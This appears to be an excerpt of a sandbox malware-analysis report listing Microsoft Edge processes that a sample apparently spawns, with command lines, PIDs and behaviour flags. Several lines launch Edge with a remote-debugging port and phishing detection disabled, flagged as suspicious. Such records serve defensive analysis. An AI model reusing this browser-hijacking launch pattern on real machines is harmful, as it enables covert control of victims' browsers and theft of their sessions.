        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4120 /prefetch:2
        8⤵
        
        PID:5244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,2806953056026230806,17387331481972997141,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4788 /prefetch:2
        8⤵
        
        PID:6908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:6104
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6496
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2
        8⤵
        
        PID:3216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
        8⤵
        
        PID:6464
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2724 /prefetch:2
        8⤵
        
        PID:820
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
        8⤵
        
        PID:5524
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3472 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:648
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3040 /prefetch:2
        8⤵
        
        PID:6460
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3524 /prefetch:2
        8⤵
        
        PID:5660
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2940 /prefetch:2
        8⤵
        
        PID:4604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3780 /prefetch:2
        8⤵
        
        PID:5560
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2504 /prefetch:2
        8⤵
        
        PID:4416
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4108 /prefetch:2
        8⤵
        
        PID:2152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,17365941619255186417,18277539096595619197,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3012 /prefetch:2
        8⤵
        
        PID:2272
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:2448
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x200,0x230,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        
        PID:1312
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
        8⤵
        
        PID:5264
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 /prefetch:3
        8⤵
        
        PID:6036
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:8
        8⤵
        
        PID:5880
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
        8⤵
        
        PID:4320
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2760 /prefetch:2
        8⤵
        
        PID:6796
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2348 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:6740
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2744 /prefetch:2
        8⤵
        
        PID:2216
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2360 /prefetch:2
        8⤵
        
        PID:2732
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3720 /prefetch:2
        8⤵
        
        PID:1160
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4172 /prefetch:2
        8⤵
        
        PID:6520
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4116 /prefetch:2
        8⤵
        
        PID:4548
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,17340975928351396122,4473756819671479365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4220 /prefetch:2
        8⤵
        
        PID:6936
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        7⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        
        PID:5544
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x204,0x234,0x7ffd2b2246f8,0x7ffd2b224708,0x7ffd2b224718
        8⤵
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:4908
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2
        8⤵
        
        PID:4056
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:3
        8⤵
        
        PID:3856
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:8
        8⤵
        
        PID:5396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2716 /prefetch:2
        8⤵
        
        PID:5484
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3476 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:3500
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2712 /prefetch:2
        8⤵
        
        PID:5536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2396 /prefetch:1
        8⤵
        Uses browser remote debugging
        
        PID:5384
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,16100391568141557795,13923851574179976610,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2696 /prefetch:2
        8⤵
        
        PID:5276
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
